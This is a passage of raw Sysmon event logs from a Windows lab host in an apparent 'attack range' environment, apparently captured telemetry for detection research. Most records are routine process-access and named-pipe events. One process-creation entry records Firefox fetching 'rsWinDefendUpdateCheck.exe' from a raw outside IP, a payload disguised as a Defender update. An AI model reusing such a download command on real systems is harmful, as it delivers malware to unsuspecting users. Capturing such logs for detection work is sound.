10341000x800000000000000047919Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.686{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047918Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.686{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047917Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.686{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047916Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.686{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047915Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.686{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047914Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.686{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047913Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.686{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047912Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.686{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047911Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.686{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047910Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.686{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 17141700x800000000000000047909Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:30:36.686{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304\chrome.3304.1.49728725C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000047908Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.624{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-E66C-63C7-9C06-00000000AF02}3260C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+3f936|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047907Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.624{FE4C2B44-D9F5-63C7-1600-00000000AF02}12961444C:\Windows\system32\svchost.exe{FE4C2B44-E66C-63C7-9C06-00000000AF02}3260C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047906Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.624{FE4C2B44-D9F5-63C7-1600-00000000AF02}12961340C:\Windows\system32\svchost.exe{FE4C2B44-E66C-63C7-9C06-00000000AF02}3260C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6154|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047905Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.624{FE4C2B44-E66B-63C7-9B06-00000000AF02}33045548C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E66C-63C7-9C06-00000000AF02}3260C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+1ab6bf1|C:\Program Files\Mozilla Firefox\xul.dll+1ab4ec7|C:\Program Files\Mozilla Firefox\xul.dll+12705|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+12237|C:\Program Files\Mozilla Firefox\xul.dll+9cdfc1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000047904Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:30:36.624{FE4C2B44-E66C-63C7-9C06-00000000AF02}3260\chrome.3304.0.157724195C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000047903Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.624{FE4C2B44-E66B-63C7-9B06-00000000AF02}33046440C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E66C-63C7-9C06-00000000AF02}3260C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+10a7bb|C:\Program Files\Mozilla Firefox\xul.dll+130eca0|C:\Windows\SYSTEM32\ntdll.dll+7f61d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000047902Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:30:36.624{FE4C2B44-E66C-63C7-9C06-00000000AF02}3260\gecko-crash-server-pipe.3304C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000047901Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.608{FE4C2B44-D9F5-63C7-1000-00000000AF02}4041720C:\Windows\system32\svchost.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6ce4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047900Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.608{FE4C2B44-D9F5-63C7-1000-00000000AF02}4041720C:\Windows\system32\svchost.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6ce4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047899Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.593{FE4C2B44-E66B-63C7-9B06-00000000AF02}33045548C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E66C-63C7-9C06-00000000AF02}3260C:\Program Files\Mozilla Firefox\firefox.exe0x101451C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+9e834a|C:\Program Files\Mozilla Firefox\xul.dll+ebac4|C:\Program Files\Mozilla Firefox\xul.dll+2581e76|C:\Program Files\Mozilla Firefox\xul.dll+1ab508d|C:\Program Files\Mozilla Firefox\xul.dll+12705|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+12237|C:\Program Files\Mozilla Firefox\xul.dll+9cdfc1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047898Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.593{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047897Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.593{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047896Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.593{FE4C2B44-DDF4-63C7-A004-00000000AF02}47004228C:\Windows\system32\csrss.exe{FE4C2B44-E66C-63C7-9C06-00000000AF02}3260C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000047895Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.593{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047894Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.593{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047893Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.593{FE4C2B44-E66B-63C7-9B06-00000000AF02}33045480C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E66C-63C7-9C06-00000000AF02}3260C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\Mozilla Firefox\xul.dll+186e3eb|C:\Program Files\Mozilla Firefox\xul.dll+9e34c6|C:\Program Files\Mozilla Firefox\xul.dll+9e1625|C:\Program Files\Mozilla Firefox\xul.dll+9e934e|C:\Program Files\Mozilla Firefox\xul.dll+82fb43|C:\Program Files\Mozilla Firefox\xul.dll+17e59b8|C:\Program Files\Mozilla Firefox\xul.dll+17d1c3b|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+1f57e|C:\Program Files\Mozilla Firefox\xul.dll+833d37|C:\Program Files\Mozilla Firefox\nss3.dll+7318c|C:\Program Files\Mozilla Firefox\nss3.dll+885b1|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000047892Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.604{FE4C2B44-E66C-63C7-9C06-00000000AF02}3260C:\Program Files\Mozilla Firefox\firefox.exe109.0FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3304.0.1577241953\23975406" -parentBuildID 20230112150232 -prefsHandle 1296 -prefMapHandle 1312 -prefsLen 25882 -prefMapSize 234522 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6e74b8a8-164d-4cf8-827c-8016e31462ac} 3304 "\\.\pipe\gecko-crash-server-pipe.3304" 1396 19fb1527858 gpuC:\Windows\system32\ATTACKRANGE\Administrator{FE4C2B44-DDF6-63C7-BDF1-300000000000}0x30f1bd2MediumMD5=66A6B001D806D3117BBA41DD55C08DE0,SHA256=0FC5FD25E5CB032AF0E867B74AD8FCB3A0F5803F3C661E398D5A03448C5CA946,IMPHASH=B9CD654B3D499FE4AD9B5E6D464FD125{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url http://45.139.105.143/d/rsWinDefendUpdateCheck.exe 10341000x800000000000000047891Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.593{FE4C2B44-D9F5-63C7-1200-00000000AF02}7565760C:\Windows\System32\svchost.exe{FE4C2B44-E66C-63C7-9C06-00000000AF02}3260C:\Program Files\Mozilla 